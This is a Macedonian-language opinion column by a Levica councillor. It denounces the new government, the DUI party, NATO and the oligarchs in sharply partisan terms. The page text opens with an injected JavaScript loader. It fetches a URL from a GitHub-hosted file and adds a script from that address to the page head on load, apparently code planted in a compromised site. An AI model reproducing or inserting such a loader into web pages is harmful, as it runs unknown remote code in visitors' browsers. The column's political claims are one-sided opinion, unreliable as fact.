;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Новата Влада има цел да ги прекрие ујдурмите за овие предходните да поминат неказнети - Антропол
АктуелноЛокалноСтав

Новата Влада има цел да ги прекрие ујдурмите за овие предходните да поминат неказнети

  • Пишува Круме Богевски, модератор на Левица и Советник во Општина Кавадарци.

Се смени владата. Дојде некоја гарнитура што никогаш и не се појави на избори, без никаква програма или пак претставување. Незнајни лица! Си се изгласаа позади затворени врати и сега државата е во нивни раце.

Ова и немаше да биде толку трагично ако не се знае работата на претходната владејачка гарнитура. Таа влада дојде на власт за да го смени името и да тргува со сите можни национални добра. Сведоци сме на систематско уништување на државата и народот во неа. Е сега новата Влада има за цел да ги прекрие ујдурмите на овие претходните за да поминат неказнети, неосудени. Небаре народот заборава!

Ним воопшто не им е гајле што воздухот е загаден, што граѓаните немаат никаква иднина во оваа држава.  Што вработувањата се повеќе рамковни или партиски, независно од способноста и образованието на кандидатите! Што има цели села, па и региони од државата кои целосно се надвор од дофат на службите, од кои државата страда, а за кои работникот плаќа и надоместува! Како се чувствуваш кога слушаш дека во општина Арачиново, каде живеат 8000 жители, само едно лице платило данок? Општината која и денес ги носи лузните од конфликтот пред 20 години. Дали навидум мирната состојба во таа општина донесе просперитет? Дали етничката хомогеност предизвикана од „застапниците на диверзитетот“ допринесе за социо-економски развој на општината? Не, но не им е гајле за тоа!

Всушност ДУИ управува со државата и имаат цел да ги разводенат и остатоците од сеќавањето на македонската државност. Од тука и не е чудно што функционерите се однесуваат така како што се однесуваат. Зошто „зелената“ ДУИ назначува за функционери, градоначалници, пратеници, членови на управни одбори од оние некогашните команданти на терористичката ОНА? А, уште позначајно е прашањето Зошто прогресивните „најголеми партии“ во државава коалицираат со политичка партија чии членови гранатираа и палеа куќи? Затоа што не им е гајле ниту за тоа!

Чудно е што немаат никаков срам за своите постапки. И оној што без ронка морал би се запрашал за последиците на своите постапки, за лицето со кое треба да се појави пред својот народ, пред оние кои му ја дале својата доверба! Во државата владее хаос во сите агли, нема никаква национална стратегија, нешто чија реализација може да ја очекуваме во тек на владеењето на актуелниот состав, што ќе го подобри животот на народот, на Македонецот, на Турчинот, на Албанецот, на маргинализираните и гладните, на тажните, изнемоштените и кревките! Веројатно борците за гарнитурата живеат во некој паралелен свет каде што маките и страдањата на обичниот човек воопшто не допираат до нив. 

Располагаат со возила вредни десетици, ако не и стотици илјади евра, гледаат да си ги обезбедат своите наследници за 3-4-5 генерации и тука завршува нивната задача. Сега не знам и нивните деца, роднини, дали ќе преживеат со овој квалитет на воздухот и водата. Впрочем, нивните деца живеат онаму каде чистиот воздух не претставува грижа, им плативме стипендии на врвни светски универзитети чии кампуси се далеку од оџаците во производните погони на олигарсите! Ама, кој ни е крив кога не сме ги штеделе сите парите од родендени и мекици!

Зарем тие дишат друг воздух, а не истиот со останатите граѓани. Сведоци сме чести катастрофи каде луѓе живи горат во неколку наврати, секојдневно луѓе гинат во сообраќајни несреќи заради хировите на потомците на олигарсите, а на властите воопшто не им е гајле за тоа, ниту пак планираат да сносат некаква одговорност. Се ова се случува додека граѓаните на Македонија живеат во агонија, а на таков народ му е сеедно дали ќе го испокрадат, запалат или отрујат. 

Повеќе години надворешните фактори придонесуваат за оваа состојба на македонскиот народ и нивниот труд дава резултати што, за жал се на штета на чесниот граѓанин. Надворешните фактори како НАТО, каде со години молевме да не „интегрираат“ за да сега собираат членарина од 1,2 милиони евра годишно од нас, додека нашите војници немаат чизми, па се приморани со патики да одат на работа. Зарем мислевте дека странските посредници во договорите каде секогаш губиме по нешто ќе ни обезбедат комодитет? Не, ниту ним им е гајле за тоа! Ќе продолжат да си бараат лесно подмитливи пиони меѓу новите функционери на реформираната Влада кои ќе продолжат да го предаваат својот народ, затоа што… од своите си патиме!

И да заклучам! Ќе се промени нешто со новата влада? НЕ! Памети народе, фаќај белешки за постапките на оние кои не водат! Ќе побараат нов мандат наскоро. Чувајте ги белешките за тогаш!